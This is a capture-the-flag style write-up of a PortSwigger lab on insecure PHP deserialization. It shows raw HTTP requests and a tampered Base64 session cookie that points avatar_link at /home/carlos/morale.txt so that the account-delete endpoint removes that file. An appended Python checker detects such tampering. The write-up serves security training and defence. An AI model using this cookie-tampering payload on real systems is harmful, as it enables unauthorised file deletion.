Using application functionality to exploit insecure deserialization

Solution

Log in to the website as user wiener:

POST /login HTTP/2
Host: 0a86007004b6e34880f4858900b600e1.web-security-academy.net
Cookie: session=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net
Referer: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0a86007004b6e34880f4858900b600e1.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Edit the session cookie: set avatar_link to the file path /home/carlos/morale.txt and change the string length prefix from s:19 to s:23 so it matches the new value.

OLD: Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
___
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"m2rwm7rmj6yzsgm595tsts5wrzf4hicn";s:11:"avatar_link";s:19:"users/wiener/avatar";}
___
NEW:
Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MjM6Ii9ob21lL2Nhcmxvcy9tb3JhbGUudHh0Ijt9
___
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"m2rwm7rmj6yzsgm595tsts5wrzf4hicn";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
---
POST /my-account/delete HTTP/2
Host: 0ad0000203f0e079832d072d00ff007f.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjU6ImdyZWdnIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI6ImsyZ200bmRpenJqaGpyYzAxY2Z6ejNrcXhpbzczMGpoIjtzOjExOiJhdmF0YXJfbGluayI7czoxODoidXNlcnMvZ3JlZ2cvYXZhdGFyIjt9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: https://0ad0000203f0e079832d072d00ff007f.web-security-academy.net
Referer: https://0ad0000203f0e079832d072d00ff007f.web-security-academy.net/my-account?id=gregg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /my-account/delete HTTP/2
Host: 0a86007004b6e34880f4858900b600e1.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MjM6Ii9ob21lL2Nhcmxvcy9tb3JhbGUudHh0Ijt9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net
Referer: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved
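
Seen from the server side, the edited cookie above is easy to tell apart from the original. The following is an added example, not part of the original write-up or of the lab's code: it parses the serialized User object from the cookie, enforces the `s:<len>` prefixes, and flags an avatar_link outside `users/<username>/`. That directory layout is an assumption taken from the original cookie value, and all function names are hypothetical.

```python
import base64
import posixpath
import re
from urllib.parse import quote, unquote

# Decoded cookie values as shown in the write-up (original and edited).
ORIGINAL = ('O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";'
            's:32:"m2rwm7rmj6yzsgm595tsts5wrzf4hicn";s:11:"avatar_link";'
            's:19:"users/wiener/avatar";}')
TAMPERED = ORIGINAL.replace('s:19:"users/wiener/avatar"',
                            's:23:"/home/carlos/morale.txt"')

def to_cookie(serialized):
    """Encode the way the cookie is carried: Base64, then URL-encoding."""
    return quote(base64.b64encode(serialized.encode()).decode(), safe="")

def read_string(buf, pos):
    """Read one PHP `s:<len>:"<bytes>";` item, enforcing the length prefix."""
    m = re.compile(rb's:(\d+):"').match(buf, pos)
    if not m:
        raise ValueError(f"expected string at offset {pos}")
    end = m.end() + int(m.group(1))
    if buf[end:end + 2] != b'";':
        raise ValueError("length prefix does not match string body")
    return buf[m.end():end].decode(), end + 2

def parse_user_cookie(cookie):
    """Parse O:<n>:"<class>":<count>:{...}; string-only properties (assumption)."""
    buf = base64.b64decode(unquote(cookie))
    m = re.match(rb'O:\d+:"(\w+)":(\d+):\{', buf)
    if not m:
        raise ValueError("not a serialized PHP object")
    pos, props = m.end(), {}
    for _ in range(int(m.group(2))):
        key, pos = read_string(buf, pos)
        props[key], pos = read_string(buf, pos)
    if buf[pos:] != b"}":
        raise ValueError("trailing data after object")
    return m.group(1).decode(), props

def avatar_link_findings(cookie):
    """Flag avatar_link values outside users/<username>/ (assumed layout)."""
    _, props = parse_user_cookie(cookie)
    link = posixpath.normpath(props["avatar_link"])
    findings = []
    if link.startswith("/"):
        findings.append("absolute path")
    if not link.startswith(f"users/{props['username']}/"):
        findings.append("outside user directory")
    return findings
```

A check like this is only a backstop: the cookie is fully client-controlled, so the durable fix is to keep avatar_link server-side or to sign the cookie and verify the signature before deserializing it.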